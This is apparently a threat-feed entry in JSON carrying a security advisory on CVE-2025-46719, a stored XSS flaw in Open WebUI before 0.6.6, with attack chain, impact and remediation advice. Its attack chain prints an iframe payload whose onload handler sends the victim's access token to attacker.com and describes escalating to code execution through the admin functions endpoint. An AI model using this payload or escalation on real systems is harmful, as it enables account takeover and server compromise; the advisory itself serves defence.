{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata. Fed continuously.","feed_url":"https://feed.craftedsignal.io/products/open-webui--0.6.6/feed.json","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cpes":["cpe:2.3:a:openwebui:open_webui:*:*:*:*:*:*:*:*"],"_cs_cves":[{"cvss":5.4,"id":"CVE-2025-46719"}],"_cs_exploited":false,"_cs_has_poc":false,"_cs_poc_references":[],"_cs_products":["open-webui (\u003c 0.6.6)"],"_cs_severities":["high"],"_cs_tags":["xss","rce","web-application","open-webui"],"_cs_type":"advisory","_cs_vendors":["Open WebUI"],"content_html":"\u003cp\u003eA critical vulnerability, tracked as CVE-2025-46719, affects Open WebUI versions prior to 0.6.6, allowing for stored Cross-Site Scripting (XSS) attacks. The flaw stems from the \u003ccode\u003eMarkdownTokens.svelte\u003c/code\u003e component, which improperly renders specific HTML tags within chat messages, enabling JavaScript injection. Attackers can embed malicious scripts in chat transcripts that execute when a user views the message, leading to the theft of access tokens and full account compromise. If an administrator account is targeted, the stolen token can be used to achieve Remote Code Execution (RCE) on the Open WebUI backend server by creating functions with arbitrary Python code. This vulnerability is \u0026quot;wormable,\u0026quot; as infected chat transcripts can be shared across the same server or uploaded to the public \u003ccode\u003eopenwebui.com\u003c/code\u003e platform, spreading the exploit to other users upon viewing.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker crafts a malicious chat message containing an \u003ccode\u003e\u0026lt;iframe\u0026gt;\u003c/code\u003e tag with an \u003ccode\u003eonload\u003c/code\u003e event, designed to exfiltrate access tokens (e.g., \u003ccode\u003e\u0026lt;iframe src=\u0026quot;http://localhost:8080/api/v1/files/\u0026quot; onload=\u0026quot;fetch('https://attacker.com/?token=' + localStorage.getItem('token'))\u0026quot;\u0026gt;\u0026lt;/iframe\u0026gt;\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eThe attacker sends this malicious chat message within the Open WebUI application.\u003c/li\u003e\n\u003cli\u003eA victim user, potentially an administrator, opens the infected chat transcript, causing the embedded malicious \u003ccode\u003e\u0026lt;iframe\u0026gt;\u003c/code\u003e to render.\u003c/li\u003e\n\u003cli\u003eThe malicious JavaScript embedded in the \u003ccode\u003eonload\u003c/code\u003e attribute executes in the victim's browser, fetching and exfiltrating the victim's session access token to the attacker-controlled server.\u003c/li\u003e\n\u003cli\u003eIf the victim was an administrator, the attacker uses the stolen admin access token to authenticate to the Open WebUI backend API.\u003c/li\u003e\n\u003cli\u003eThe attacker sends a POST request to the \u003ccode\u003e/api/v1/functions\u003c/code\u003e endpoint (e.g., \u003ccode\u003ehttp://localhost:5174/admin/functions\u003c/code\u003e) with a JSON payload containing malicious Python code.\u003c/li\u003e\n\u003cli\u003eThe Open WebUI backend server processes and executes the malicious Python code within the newly created function, leading to Remote Code Execution on the underlying host system.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves full control over the Open WebUI instance and potentially the underlying server.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2025-46719 can lead to severe consequences. Users are at risk of full account takeover through stolen access tokens, enabling attackers to impersonate them, access their data, and manipulate their chat history. The wormable nature of the XSS means that merely viewing an infected chat transcript can compromise a user, allowing the attack to spread rapidly, especially if \u0026quot;Enable Community Sharing\u0026quot; is active on \u003ccode\u003eopenwebui.com\u003c/code\u003e. If an administrative account is compromised, the attacker can leverage the RCE capability to execute arbitrary code on the server hosting Open WebUI, potentially gaining full control of the server, exfiltrating sensitive data, or deploying further malware.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eImmediately update Open WebUI installations to version 0.6.6 or newer to remediate CVE-2025-46719.\u003c/li\u003e\n\u003cli\u003eReview web server access logs for POST requests to \u003ccode\u003e/api/v1/functions\u003c/code\u003e from non-administrative or unexpected sources, as this endpoint is used for RCE.\u003c/li\u003e\n\u003cli\u003eMonitor network traffic for outbound connections to suspicious or unknown domains from Open WebUI client systems, which could indicate exfiltration of \u003ccode\u003elocalStorage\u003c/code\u003e tokens as referenced in \u003ccode\u003ehttps://attacker.com/?token=\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eEducate users on the risks of opening chat transcripts from untrusted sources, especially those containing \u003ccode\u003e\u0026lt;iframe\u0026gt;\u003c/code\u003e tags or unusual content, even if the domain \u003ccode\u003ehttp://localhost:8080/api/v1/files/\u003c/code\u003e is present.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-07-07T16:57:54Z","date_published":"2026-07-07T16:57:54Z","id":"https://feed.craftedsignal.io/briefs/2026-07-open-webui-stored-xss-rce/","summary":"A high-severity stored Cross-Site Scripting (XSS) vulnerability, CVE-2025-46719, exists in Open WebUI versions prior to 0.6.6 due to improper rendering of HTML tags in chat messages, specifically an unescaped markdown token in `MarkdownTokens.svelte`. This allows attackers to inject malicious JavaScript into chat transcripts, which executes in a user's browser upon viewing, enabling access token theft, full account takeover, and, if targeting an administrator, Remote Code Execution (RCE) on the backend server via malicious Python functions.","title":"Open WebUI Stored XSS Leads to Account Takeover and RCE (CVE-2025-46719)","url":"https://feed.craftedsignal.io/briefs/2026-07-open-webui-stored-xss-rce/"}],"language":"en","title":"CraftedSignal Threat Feed - Open-Webui (\u003c 0.6.6)","version":"https://jsonfeed.org/version/1.1"}